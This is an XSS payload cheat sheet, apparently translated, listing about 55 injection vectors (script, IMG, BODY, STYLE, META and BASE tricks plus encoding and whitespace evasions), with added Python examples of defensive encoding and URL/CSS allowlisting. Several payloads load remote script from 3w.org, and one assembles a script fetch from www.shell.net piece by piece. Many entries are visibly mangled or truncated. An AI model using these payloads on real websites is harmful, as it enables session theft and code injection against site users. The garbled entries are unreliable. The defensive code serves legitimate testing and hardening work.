(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
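
The vectors in (1) and (99) all work the same way: untrusted text reaches an HTML text node or an attribute without context-aware encoding, and the `" onclick=` variants additionally rely on the attribute being unquoted. The following is an added example (not code from the original list) showing the defender's side: a hypothetical comment template that encodes for the text-node context and for the quoted-attribute context, plus a parser-based check that the rendered markup contains exactly the elements the template wrote. The sample inputs are constructed from the page's own payloads; the template, function names and the `data-author` attribute are assumptions for the example.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs, modelled on the page's items (1), (99) and (6):
# tag injection, event-handler injection and attribute break-out.
SAMPLE_INPUTS = [
    '<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>',
    '<q/oncut=alert()>1',
    '<a onclick=alert`1`>clickme</a>',
    '" onclick="alert(1)//',
    '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">',
]


def render_text(user_input: str) -> str:
    """Encode untrusted data for an HTML text node: & < > are what matter there."""
    return html.escape(user_input, quote=False)


def render_attribute(user_input: str) -> str:
    """Encode untrusted data for an attribute value and always emit the quotes;
    an unquoted attribute is exactly what the '" onclick=' variants break out of."""
    return '"' + html.escape(user_input, quote=True) + '"'


def build_comment_html(author: str, body: str) -> str:
    """Hypothetical template: author lands in an attribute, body in a text node."""
    return f'<p class="comment" data-author={render_attribute(author)}>{render_text(body)}</p>'


def build_comment_html_naive(author: str, body: str) -> str:
    """The same template with no encoding and no attribute quoting, for comparison."""
    return f'<p class="comment" data-author={author}>{body}</p>'


class _Collector(HTMLParser):
    """Records what a browser-like parser sees: start tags, their attributes, text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags, self.attrs, self.text = [], [], ''

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.append(dict(attrs))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_data(self, data):
        self.text += data


def parse_rendered(markup: str):
    parser = _Collector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.attrs, parser.text


def is_safely_rendered(markup: str, author: str, body: str) -> bool:
    """True only if the single element is our <p>, its attributes are exactly the
    ones the template wrote, and the text node is the unmodified body. Any
    injected tag, extra attribute or altered value makes this False."""
    tags, attrs, text = parse_rendered(markup)
    return (tags == ['p']
            and attrs == [{'class': 'comment', 'data-author': author}]
            and text == body)
```

The check is deliberately structural rather than a blacklist of strings: it asks the parser what elements came out, so it catches the event-handler and attribute-break-out forms without knowing their spelling. Run `is_safely_rendered(build_comment_html(s, s), s, s)` over `SAMPLE_INPUTS` to see every payload survive only as inert text, and the naive template with `'" onclick="alert(1)//'` as author to see the break-out.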

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open bracket
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle bracket
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//
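
Item (29) targets code that drops user input into a JavaScript string literal and "protects" it by escaping only the quote character: the attacker supplies the backslash, which swallows the added one, and the quote then closes the literal. The following is an added example, not from the original list, contrasting that naive escaper with a JSON-based encoder that escapes the backslash first and also neutralises `<`, `>` and `&` so the literal can never close the enclosing `<script>` block (the page's item (30) shows why closing the enclosing tag matters). The payload constants are constructed from the page's payloads; the function names and the `var name = ...;` template are assumptions for the example.

```python
import json

# Constructed inputs, modelled on item (29) (escaping the escape) and on
# item (30) (closing the enclosing tag from inside a script block).
ESCAPE_PAYLOAD = "\\\";alert('XSS');//"              # the characters  \";alert('XSS');//
CLOSE_TAG_PAYLOAD = "</script><script>alert('XSS')</script>"


def naive_js_string(value: str) -> str:
    """Common mistake: escape the quote only. The attacker's own backslash
    eats the added backslash and the quote terminates the literal."""
    return '"' + value.replace('"', '\\"') + '"'


def js_string_literal(value: str) -> str:
    """JSON-encode (backslash, quote and control characters, U+2028/2029 included
    because ensure_ascii is on), then also escape < > & so the literal can never
    terminate a <script> block or start a tag."""
    literal = json.dumps(value)
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def embed_in_script(value: str) -> str:
    """Hypothetical inline-script template that carries a user-supplied value."""
    return 'var name = ' + js_string_literal(value) + ';'


def literal_round_trips(literal: str, original: str) -> bool:
    """Parse the emitted literal with a JSON parser (a strict subset of the JS
    string grammar). If it is not exactly one string equal to the original,
    the literal was broken out of."""
    try:
        return json.loads(literal) == original
    except ValueError:
        return False


def can_close_script_block(literal: str) -> bool:
    """A literal containing a raw '</script' ends the script block regardless
    of JavaScript quoting, because the HTML parser runs first."""
    return '</script' in literal.lower()
```

With `ESCAPE_PAYLOAD`, `naive_js_string` yields `"\\";alert('XSS');//"`, which a parser reads as the one-character string `\` followed by free-standing code; `js_string_literal` yields `"\\\";alert('XSS');//"`, which round-trips to the original text.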

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (consists of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
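
Items (3) to (19) and (31) to (55) share one root cause: a URL-valued attribute (`SRC`, `HREF`, `BACKGROUND`, `DYNSRC`, `LOWSRC`, CSS `url()`) accepts an attacker-chosen scheme, and the evasions (mixed case in (4), entity encoding in (5) and (8) to (10), embedded tab, newline, carriage return and null in (11) to (14) and (17), leading whitespace in (19), the extra code points listed in (47)) exist to defeat a plain substring check for `javascript:`. The following is an added example, not code from the original list, of the check a defender should use instead: normalise the value the way the browser will (entity-decode, drop the ignored characters) and then allowlist the scheme; a second function applies the same rule to a CSS property value and rejects IE's `expression()` outright (items (48) to (52)). `ALLOWED_SCHEMES`, the function names, the example hostnames and the reading of the page's truncated "8192-8&13" as the range 8192 to 8202 are assumptions made for this example; the sample inputs are constructed from the page's payloads.

```python
import html
import re
from urllib.parse import urlsplit

# Characters a browser drops or tolerates inside a URL before it reads the
# scheme: ASCII controls, space, DEL, plus the code points item (47) lists
# (160, 12288, 65279, and 8192-8202 as our reading of the truncated "8192-8&13").
_IGNORED = re.compile(r'[\x00-\x20\x7f\xa0\u2000-\u200a\u3000\ufeff]')

# Assumption for this example: the application only ever links to these schemes.
ALLOWED_SCHEMES = {'http', 'https', 'mailto'}


def normalize_url(value: str) -> str:
    """Undo what the HTML parser undoes before the URL is ever fetched."""
    decoded = html.unescape(value)          # &#106;avascript: -> javascript:  (items 5, 8-10)
    return _IGNORED.sub('', decoded)        # jav\tascript:, java\0script:, leading spaces


def is_safe_url(value: str) -> bool:
    """Allowlist on the scheme only; relative references (no scheme) pass.
    urlsplit already lowercases the scheme, which covers item (4)."""
    try:
        scheme = urlsplit(normalize_url(value)).scheme.lower()
    except ValueError:                      # malformed netloc, e.g. unbalanced '['
        return False
    return scheme == '' or scheme in ALLOWED_SCHEMES


def decode_css_escapes(value: str) -> str:
    """CSS allows a token to be written as \\65 xpression; decode before matching.
    Hex escapes take up to six digits and swallow one following whitespace."""
    value = re.sub(r'\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?',
                   lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), value)
    return re.sub(r'\\(.)', r'\1', value, flags=re.DOTALL)


_URL_FUNC = re.compile(r'url\(["\']?(.*?)["\']?\)', re.IGNORECASE | re.DOTALL)
_EXPRESSION = re.compile(r'expression\(', re.IGNORECASE)


def is_safe_css_value(value: str) -> bool:
    """For one CSS property value: every url() argument must pass is_safe_url
    and expression() is never acceptable. Normalisation removes the ignored
    characters first, so 'expression (' and split spellings are caught too."""
    norm = _IGNORED.sub('', decode_css_escapes(html.unescape(value)))
    if _EXPRESSION.search(norm):
        return False
    return all(is_safe_url(m.group(1)) for m in _URL_FUNC.finditer(norm))
```

The important design choice is the order of operations: decode first, strip second, compare last. Checking for the literal string `javascript:` before decoding is what every encoded or split variant on this page is built to get past. Untrusted data should still never be placed into `style` attributes or stylesheets at all; `is_safe_css_value` is for auditing what is already there.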